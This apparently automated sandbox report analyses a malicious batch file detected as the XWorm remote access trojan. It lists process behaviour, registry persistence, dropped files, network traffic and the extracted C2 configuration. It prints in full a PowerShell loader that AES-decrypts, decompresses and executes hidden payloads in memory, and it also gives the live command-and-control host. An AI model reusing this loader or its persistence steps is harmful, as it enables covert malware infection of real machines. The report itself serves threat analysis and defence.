File name:

$phantom-startup_str_653.bat

Full analysis: https://app.any.run/tasks/b924ed0c-387f-42d9-b5e4-5498dc439565
Verdict: Malicious activity
Threats:

XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails.

Malware Trends Tracker     >>>
Analysis date: July 25, 2024, 17:55:26
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
xworm
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (58252), with CRLF line terminators
MD5:

4C8ADEEF27AF1B0A3598339FF30E5435

SHA1:

2688123B82393E379067D5B6B2D9834F4CA8D4E5

SHA256:

991CDE00530EBA2607DC5C3A3A5BBECF02B7D32A828AFA4DB0EDB12F104BA172

SSDEEP:

6144:cBPQm/4iiFcBD1fayZIGq6XODlhg0/lYSMI9Th+p6P:hm9iFcB1aWINB3gFSTMC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 6416)
      • powershell.exe (PID: 6888)
      • powershell.exe (PID: 1616)
      • powershell.exe (PID: 372)
      • powershell.exe (PID: 1956)

    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 6416)
      • powershell.exe (PID: 6888)
      • powershell.exe (PID: 1616)
      • powershell.exe (PID: 372)
      • powershell.exe (PID: 1956)

    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 6416)
      • powershell.exe (PID: 6888)
      • powershell.exe (PID: 1616)
      • powershell.exe (PID: 372)
      • powershell.exe (PID: 1956)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 6416)
      • powershell.exe (PID: 6888)
      • powershell.exe (PID: 1616)
      • powershell.exe (PID: 372)
      • powershell.exe (PID: 1956)

    • XWORM has been detected (YARA)

      • powershell.exe (PID: 1616)

  • SUSPICIOUS

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6416)
      • powershell.exe (PID: 6888)
      • powershell.exe (PID: 1616)
      • powershell.exe (PID: 372)
      • powershell.exe (PID: 1956)

    • Cryptography encrypted command line is found

      • cmd.exe (PID: 6344)
      • cmd.exe (PID: 6476)
      • cmd.exe (PID: 2816)
      • cmd.exe (PID: 1620)
      • cmd.exe (PID: 4388)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 6316)
      • powershell.exe (PID: 6416)
      • cmd.exe (PID: 7156)
      • wscript.exe (PID: 1736)
      • cmd.exe (PID: 1476)
      • wscript.exe (PID: 6616)
      • cmd.exe (PID: 2476)
      • wscript.exe (PID: 3996)
      • cmd.exe (PID: 712)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6316)
      • cmd.exe (PID: 7156)
      • cmd.exe (PID: 1476)
      • cmd.exe (PID: 2476)
      • cmd.exe (PID: 712)

    • Executing commands from a ".bat" file

      • cmd.exe (PID: 6316)
      • powershell.exe (PID: 6416)
      • cmd.exe (PID: 7156)
      • cmd.exe (PID: 1476)
      • wscript.exe (PID: 1736)
      • cmd.exe (PID: 2476)
      • wscript.exe (PID: 3996)
      • wscript.exe (PID: 6616)
      • cmd.exe (PID: 712)

    • Application launched itself

      • cmd.exe (PID: 6316)
      • cmd.exe (PID: 7156)
      • cmd.exe (PID: 1476)
      • cmd.exe (PID: 2476)
      • cmd.exe (PID: 712)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 1736)
      • wscript.exe (PID: 3996)
      • wscript.exe (PID: 6616)

    • The process executes VB scripts

      • powershell.exe (PID: 6888)

    • Process drops legitimate windows executable

      • WinRAR.exe (PID: 4328)

    • Connects to unusual port

      • powershell.exe (PID: 1616)

  • INFO

    • Checks current location (POWERSHELL)

      • powershell.exe (PID: 6416)
      • powershell.exe (PID: 1616)
      • powershell.exe (PID: 6888)
      • powershell.exe (PID: 372)
      • powershell.exe (PID: 1956)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 6416)
      • powershell.exe (PID: 6888)
      • powershell.exe (PID: 1616)
      • powershell.exe (PID: 372)
      • powershell.exe (PID: 1956)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 6416)
      • powershell.exe (PID: 6888)
      • powershell.exe (PID: 1616)
      • powershell.exe (PID: 372)
      • powershell.exe (PID: 1956)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6416)
      • powershell.exe (PID: 6888)
      • powershell.exe (PID: 1616)
      • powershell.exe (PID: 372)
      • powershell.exe (PID: 1956)

    • Checks supported languages

      • TextInputHost.exe (PID: 4304)

    • Manual execution by a user

      • WinRAR.exe (PID: 4328)
      • wscript.exe (PID: 3996)
      • wscript.exe (PID: 6616)

    • Reads the computer name

      • TextInputHost.exe (PID: 4304)

    • Reads security settings of Internet Explorer

      • dllhost.exe (PID: 6940)

    • Reads the software policy settings

      • slui.exe (PID: 5824)

    • Checks proxy server information

      • slui.exe (PID: 5824)

    • Drops the executable file immediately after the start

      • WinRAR.exe (PID: 4328)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

XWorm

(PID) Process(1616) powershell.exe
C2korkos.now-dns.net:1000
Keys
AES<123456789>
Options
Splitter<Xwormmm>
Sleep time3
USB drop nameObso
MutexvwfYie59Ng9ErMN1
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
159
Monitored processes
31
Malicious processes
13
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs powershell.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs #XWORM powershell.exe slui.exe rundll32.exe no specs explorer.exe no specs COpenControlPanel no specs COpenControlPanel no specs textinputhost.exe no specs Copy/Move/Rename/Delete/Link Object no specs winrar.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs powershell.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
204\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
304C:\WINDOWS\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}C:\Windows\SysWOW64\dllhost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ucrtbase.dll
c:\windows\syswow64\combase.dll
372"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
700\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
712C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\$phantom-startup_str_269.bat" "C:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
836C:\WINDOWS\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}C:\Windows\SysWOW64\dllhost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ucrtbase.dll
c:\windows\syswow64\combase.dll
1108C:\WINDOWS\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -EmbeddingC:\Windows\explorer.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
10.0.19041.3758 (WinBuild.160101.0800)
Modules
Images
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shcore.dll
1476C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\$phantom-startup_str_269.bat" "C:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
1616"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
XWorm
(PID) Process(1616) powershell.exe
C2korkos.now-dns.net:1000
Keys
AES<123456789>
Options
Splitter<Xwormmm>
Sleep time3
USB drop nameObso
MutexvwfYie59Ng9ErMN1
1620C:\WINDOWS\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('nECNd/L1mmnLu0yrHo8rB1twG/u01zbCzViO2TnsjPc='); $aes_var.IV=[System.Convert]::FromBase64String('xLCc64kfbfPjcKUP7HS9XA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $MSjuJ=New-Object System.IO.MemoryStream(,$param_var); $HZEgy=New-Object System.IO.MemoryStream; $uQNnI=New-Object System.IO.Compression.GZipStream($MSjuJ, [IO.Compression.CompressionMode]::Decompress); $uQNnI.CopyTo($HZEgy); $uQNnI.Dispose(); $MSjuJ.Dispose(); $HZEgy.Dispose(); $HZEgy.ToArray();}function execute_function($param_var,$param2_var){ $ELaDA=[System.Reflection.Assembly]::Load([byte[]]$param_var); $spaWs=$ELaDA.EntryPoint; $spaWs.Invoke($null, $param2_var);}$PFCBO = 'C:\Users\admin\AppData\Roaming\$phantom-startup_str_269.bat';$host.UI.RawUI.WindowTitle = $PFCBO;$xZdom=[System.IO.File]::ReadAllText($PFCBO).Split([Environment]::NewLine);foreach ($GjLvk in $xZdom) { if ($GjLvk.StartsWith('ZtpcgDPpPDcruOYNfIsH')) { $cJbuR=$GjLvk.Substring(20); break; }}$payloads_var=[string[]]$cJbuR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
Total events
55 996
Read events
55 868
Write events
124
Delete events
4

Modification events

(PID) Process:(6416) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(6416) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(6416) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(6416) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(6888) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(6888) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(6888) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(6888) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(6888) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:$phantom-RuntimeBroker_startup_269_str
Value:
wscript.exe "C:\Users\admin\AppData\Roaming\$phantom-startup_str_269.vbs"
(PID) Process:(6888) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation:writeName:VBSFile
Value:
Executable files
0
Suspicious files
2
Text files
13
Unknown types
0

Dropped files

PID
Process
Filename
Type
6416powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactivebinary
MD5:65FCE105A5253ACC51F187583655EFD8
SHA256:D0011C319D58A8020151961F1A374EE2E1A1AFB22E50528DFEABF9A22DAE773A
1616powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_b4szxujc.ixx.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6416powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ah2gvhje.h3e.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6888powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_d5vuempk.kc5.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6888powershell.exeC:\Users\admin\AppData\Roaming\$phantom-startup_str_269.vbstext
MD5:B053013A14ABB6D5831C5B951722935F
SHA256:28AAE66CE3A644EB0F5644DD4225B4D3388B00C75690BC3CBB3FD1DCA1FA02BE
6888powershell.exeC:\Users\admin\AppData\Roaming\$phantom-startup_str_269.battext
MD5:4C8ADEEF27AF1B0A3598339FF30E5435
SHA256:991CDE00530EBA2607DC5C3A3A5BBECF02B7D32A828AFA4DB0EDB12F104BA172
1616powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pk3iuwfe.pk4.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6888powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ntki3402.m23.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1956powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4ssxbpid.b4k.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1956powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ujcio0zi.nr3.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
36
DNS requests
14
Threats
5

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
6200
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6012
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
184.86.251.5:443
Akamai International B.V.
DE
unknown
4204
svchost.exe
4.209.32.198:443
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
3952
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:137
whitelisted
6200
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6396
slui.exe
40.91.76.224:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 51.104.136.2
whitelisted
google.com
  • 142.250.185.206
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted
korkos.now-dns.net
  • 199.127.62.226
malicious
dns.msftncsi.com
  • 131.107.255.255
whitelisted
self.events.data.microsoft.com
  • 52.168.117.171
whitelisted
slscr.update.microsoft.com
  • 13.85.23.86
whitelisted

Threats

PID
Process
Class
Message
2284
svchost.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS Query to a *.now-dns .net Domain
2284
svchost.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS Query to a *.now-dns .net Domain
2284
svchost.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS Query to a *.now-dns .net Domain
2284
svchost.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS Query to a *.now-dns .net Domain
2284
svchost.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS Query to a *.now-dns .net Domain
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
$phantom-startup_str_653.bat